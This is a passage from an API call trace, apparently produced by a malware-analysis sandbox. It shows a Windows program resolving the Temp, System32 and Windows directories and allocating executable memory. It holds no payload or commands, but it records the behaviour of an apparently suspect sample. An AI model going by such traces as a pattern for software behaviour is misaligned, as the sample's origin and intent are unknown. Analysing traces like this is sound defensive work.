ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114c6f8 [0127.775] FindNextFileW (in: hFindFile=0x114c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.775] GetLastError () returned 0x12 [0127.775] FindClose (in: hFindFile=0x114c6f8 | out: hFindFile=0x114c6f8) returned 1 [0127.776] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.776] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.776] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0127.776] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x114c6f8 [0127.776] FindNextFileW (in: hFindFile=0x114c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0127.776] GetLastError () returned 0x12 [0127.776] FindClose (in: hFindFile=0x114c6f8 | out: hFindFile=0x114c6f8) returned 1 [0127.777] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.777] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.777] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0127.777] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x114c6f8 [0127.777] FindNextFileW (in: hFindFile=0x114c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0127.777] GetLastError () returned 0x12 [0127.777] FindClose (in: hFindFile=0x114c6f8 | out: hFindFile=0x114c6f8) returned 1 [0127.778] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.778] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.779] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.779] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.779] SysReAllocStringLen (in: pbstr=0x28fe68*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe68*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.779] SysReAllocStringLen (in: pbstr=0x3370060*="c:\\users\\keecfm~1\\appdata\\local\\temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x3370060*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.780] VirtualAlloc (lpAddress=0x3374000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0127.783] GetSystemDirectoryW (in: lpBuffer=0x3373b58, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.783] CharLowerBuffW (in: lpsz="C:\\Windows\\system32", cchLength=0x13 | out: lpsz="c:\\windows\\system32") returned 0x13 [0127.783] SysReAllocStringLen (in: pbstr=0x3383b60*=0x0, psz="c:\\windows\\system32", len=0x13 | out: pbstr=0x3383b60*="c:\\windows\\system32") returned 1 [0127.783] SysReAllocStringLen (in: pbstr=0x3383b64*=0x0, psz="c:", len=0x2 | out: pbstr=0x3383b64*="c:") returned 1 [0127.784] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="windows", len=0x7 | out: pbstr=0x3330834*="windows") returned 1 [0127.784] SysReAllocStringLen (in: pbstr=0x3383b98*=0x0, psz="system32", len=0x8 | out: pbstr=0x3383b98*="system32") returned 1 [0127.784] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.784] SysReAllocStringLen (in: pbstr=0x28fe58*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe58*="c:\\") returned 1 [0127.785] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0127.785] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x114f2c0 [0127.785] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0127.785] GetLastError () returned 0x12 [0127.785] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.785] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0127.785] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe58*="c:\\Windows\\") returned 1 [0127.785] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="system32", len=0x8 | out: pbstr=0x28fae8*="system32") returned 1 [0127.785] FindFirstFileW (in: lpFileName="c:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x114f2c0 [0127.786] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0 [0127.786] GetLastError () returned 0x12 [0127.786] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.786] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Windows\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fadc*="c:\\Windows\\System32") returned 1 [0127.786] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32", psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fe58*="c:\\Windows\\System32\\") returned 1 [0127.786] VirtualFree (lpAddress=0x3384000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0127.788] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fad8*="c:\\Windows\\System32\\") returned 1 [0127.788] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe58*="c:\\Windows\\System32") returned 1 [0127.788] SysReAllocStringLen (in: pbstr=0x28fe5c*=0x0, psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe5c*="c:\\Windows\\System32") returned 1 [0127.788] SysReAllocStringLen (in: pbstr=0x3370058*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x3370058*="c:\\Windows\\System32\\") returned 1 [0127.789] SysReAllocStringLen (in: pbstr=0x28fe50*=0x0, psz="c:", len=0x2 | out: pbstr=0x28fe50*="c:") returned 1 [0127.789] SysReAllocStringLen (in: pbstr=0x337005c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x337005c*="c:\\") returned 1 [0127.789] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x3373b58 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0127.789] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0127.789] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x337009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0127.790] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.790] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.790] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x33700d4*="keecfm~1") returned 1 [0127.790] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.790] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="local", len=0x5 | out: pbstr=0x33700ec*="local") returned 1 [0127.791] SysReAllocStringLen (in: pbstr=0x33700f8*=0x0, psz="temp", len=0x4 | out: pbstr=0x33700f8*="temp") returned 1 [0127.791] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.791] SysReAllocStringLen (in: pbstr=0x28fe44*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe44*="c:\\") returned 1 [0127.791] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.792] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.792] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.792] GetLastError () returned 0x12 [0127.792] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.792] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.792] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe44*="c:\\Users\\") returned 1 [0127.792] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0127.792] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.793] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.793] GetLastError () returned 0x12 [0127.793] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.793] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.793] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.793] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.793] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.794] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.794] GetLastError () returned 0x12 [0127.794] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.794] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.794] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.794] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0127.794] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x114f2c0 [0127.795] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0127.795] GetLastError () returned 0x12 [0127.795] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.795] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.795] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.795] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0127.796] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x114f2c0 [0127.796] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0127.796] GetLastError () returned 0x12 [0127.796] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.796] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.796] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.797] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.797] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.798] SysReAllocStringLen (in: pbstr=0x28fe48*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe48*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0127.798] SysReAllocStringLen (in: pbstr=0x3370064*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x3370064*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0127.798] GetWindowsDirectoryW (in: lpBuffer=0x3373b58, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0127.799] CharLowerBuffW (in: lpsz="C:\\Windows", cchLength=0xa | out: lpsz="c:\\windows") returned 0xa [0127.799] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\windows", len=0xa | out: pbstr=0x337009c*="c:\\windows") returned 1 [0127.799] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.799] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="windows", len=0x7 | out: pbstr=0x3330834*="windows") returned 1 [0127.800] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.800] SysReAllocStringLen (in: pbstr=0x28fe38*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe38*="c:\\") returned 1 [0127.800] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0127.800] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x114f2c0 [0127.800] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0127.800] GetLastError () returned 0x12 [0127.800] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.800] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0127.801] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe38*="c:\\Windows\\") returned 1 [0127.801] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, 